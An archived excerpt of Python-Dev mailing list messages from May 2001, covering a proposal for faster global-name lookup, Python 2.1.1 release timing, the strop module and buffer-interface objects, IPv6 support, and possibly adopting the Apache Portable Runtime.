    was defined in.  (Not sure if there are some subtle problems with
    this.)
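    For illustration only, here is a sketch of such an index assignment using the modern ast module, which is an assumption about tooling rather than part of the proposal. The names GlobalNameCollector and assign_global_indices are hypothetical; the pass numbers names in order of first appearance, which is one arbitrary choice among many.

```python
import ast

class GlobalNameCollector(ast.NodeVisitor):
    """Collect names bound at module level, plus names declared `global`
    in any nested scope.  Simplified: ignores star-imports and edge cases
    such as walrus targets inside comprehensions."""

    def __init__(self):
        self.depth = 0      # 0 while visiting module-level code
        self.names = []     # global names, in order of first appearance

    def _add(self, name):
        if name not in self.names:
            self.names.append(name)

    def _nested(self, node):
        # Bindings inside a new scope are local to it by default.
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    def _definition(self, node):
        if self.depth == 0:
            self._add(node.name)   # "def f" / "class C" binds f / C here
        self._nested(node)

    visit_FunctionDef = visit_AsyncFunctionDef = visit_ClassDef = _definition
    visit_Lambda = visit_ListComp = visit_SetComp = _nested
    visit_DictComp = visit_GeneratorExp = _nested

    def visit_Global(self, node):
        for name in node.names:
            self._add(name)

    def visit_Name(self, node):
        if self.depth == 0 and isinstance(node.ctx, ast.Store):
            self._add(node.id)

    def visit_alias(self, node):
        if self.depth == 0 and node.name != "*":
            # "import os.path" binds "os"; "import x as y" binds "y".
            self._add(node.asname or node.name.split(".")[0])


def assign_global_indices(source):
    """Return {name: slot index} for the globals of a module's source."""
    collector = GlobalNameCollector()
    collector.visit(ast.parse(source))
    return {name: i for i, name in enumerate(collector.names)}
```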

Enhancement: Optimized access to other modules' globals

    If one module imports another and binds the imported module to a
    name in its global namespace, the compiler can detect that the
    particular global is bound to a module.  The compiler could also
    note accesses to any attribute of that module and emit special
    opcodes for accessing these names.

    At runtime the implementation can look up the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in that dlict.  This would allow names such as
    types.StringType to be used with the same efficiency as
    globals. 
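    A toy model of the cached (dlict, offset) pair might look like this. SlotNamespace and ForeignGlobalRef are hypothetical names, and the sketch assumes the foreign module's numbered names are fixed once it is compiled; an attribute added to it later would have no offset and would need the slower dictionary path.

```python
class SlotNamespace:
    """Toy stand-in for a module's dlict: a name->offset map plus slots."""

    EMPTY = object()   # marker for an unbound slot

    def __init__(self, names):
        self.offsets = {name: i for i, name in enumerate(names)}
        self.slots = [self.EMPTY] * len(names)

    def store(self, name, value):
        self.slots[self.offsets[name]] = value


class ForeignGlobalRef:
    """Cached reference to a global of another module.

    The offset is looked up once, on first use; afterwards each load is a
    plain list index into the foreign module's slots, so rebinding the
    foreign global is still seen by every later load."""

    def __init__(self, namespace, name):
        self.namespace = namespace
        self.name = name
        self.offset = None

    def load(self):
        if self.offset is None:
            self.offset = self.namespace.offsets[self.name]  # one-time lookup
        value = self.namespace.slots[self.offset]
        if value is SlotNamespace.EMPTY:
            raise AttributeError(self.name)
        return value


types_ns = SlotNamespace(["StringType", "IntType"])
types_ns.store("StringType", str)
ref = ForeignGlobalRef(types_ns, "StringType")
print(ref.load() is str)   # -> True
```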

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 
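    The reverse check can be sketched with a flag that is set only when a name unknown at compile time is bound. ModuleGlobals, its attributes, and load_builtin are hypothetical names chosen for this illustration; the point is that the extra dictionary probe happens only after a dynamic change.

```python
import builtins

class ModuleGlobals:
    """Toy global namespace: numbered slots for names the compiler saw,
    plus an overflow dict for names bound dynamically at run time."""

    def __init__(self, compiled_names):
        self.index = {name: i for i, name in enumerate(compiled_names)}
        self.slots = [None] * len(compiled_names)  # values of compile-time globals
        self.extra = {}        # names the compiler never saw
        self.dynamic = False   # becomes True once such a name is bound

    def __setitem__(self, name, value):
        i = self.index.get(name)
        if i is None:
            self.extra[name] = value
            self.dynamic = True
        else:
            self.slots[i] = value

    def load_builtin(self, name):
        """Accessor for a name the compiler resolved to a builtin."""
        # Common case: no dynamic bindings, so go straight to the builtins.
        if self.dynamic and name in self.extra:
            return self.extra[name]    # a global now shadows the builtin
        return getattr(builtins, name)
```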

    These mechanisms would have little if any cost for the common case
    where a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry at digicool.com  Thu May 24 04:46:30 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one whose skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:04:58 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one whose skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry at digicool.com  Thu May 24 05:14:07 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
	<15116.30214.900667.624573@anthem.wooz.org>
	<20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles "I Wanna Hold Your Head" before being itself
displaced by The Bee Gee's "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:31:42 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz at rahul.net  Thu May 24 06:59:37 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein at lyra.org  Thu May 24 10:33:49 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.
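For reference, in present-day Python the buffer interface is reached through memoryview, so a free function in the spirit of strop.find() can be sketched as follows. This is an illustration, not strop's code: buffer_find is a hypothetical name, and it copies the data into a bytes object instead of searching in place.

```python
import array

def buffer_find(obj, sub, start=0):
    """find() for any object that exports the buffer interface.

    memoryview(obj) plays the role of strop's "t#" pointer/length pair;
    tobytes() copies the exported bytes so bytes.find() can do the search."""
    with memoryview(obj) as view:
        return view.tobytes().find(sub, start)

# The same function handles bytes, bytearray, array.array, and slices of
# another object's buffer (much like a buffer object over a subset).
print(buffer_find(array.array("B", b"x.y"), b"."))   # -> 1
```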

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.
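A rough sketch of such a mixin in present-day Python follows. ByteStringMethods and Record are hypothetical names; array.array serves as the host type only because it exports the buffer interface but has no string methods of its own.

```python
import array

class ByteStringMethods:
    """Mixin supplying string-style methods to any class whose instances
    export the buffer interface; the methods read the data via memoryview."""

    def _data(self):
        with memoryview(self) as view:
            return view.tobytes()

    def find(self, sub, start=0):
        return self._data().find(sub, start)

    def count(self, sub):
        return self._data().count(sub)

    def upper(self):
        return self._data().upper()


class Record(ByteStringMethods, array.array):
    """Example host type: array.array provides the buffer, the mixin the methods."""


rec = Record("B", b"hello.world")
print(rec.find(b"."))   # -> 5
```

Note that upper() here returns a plain bytes object rather than a new Record; a fuller mixin would have to decide how to construct results of the host type.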

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 10:52:58 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g



From thomas at xs4all.net  Thu May 24 11:01:52 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarizing purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is! Even though I have a fair number of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Thu May 24 12:18:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritance.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May 24 13:50:34 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
	<20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein at lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal at lemburg.com  Thu May 24 14:22:42 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
		<20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as a Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.



From gstein at lyra.org  Thu May 24 14:55:55 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe, or a thread ID from a thread object, etc.

> low-level Python functions require the native Python types, so
> while wrapping APR as Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. The shared mem actually is implemented mostly, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff supports optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g



From gstein at lyra.org  Thu May 24 15:00:16 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritance.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement its own .find and
.upper and .whatever.

Cheers,
-g



From mwh at python.net  Thu May 24 15:02:34 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff supports optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still fewer than Python, isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
M.


From gstein at lyra.org  Thu May 24 15:59:21 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face).

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff supports optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure, it's smaller.

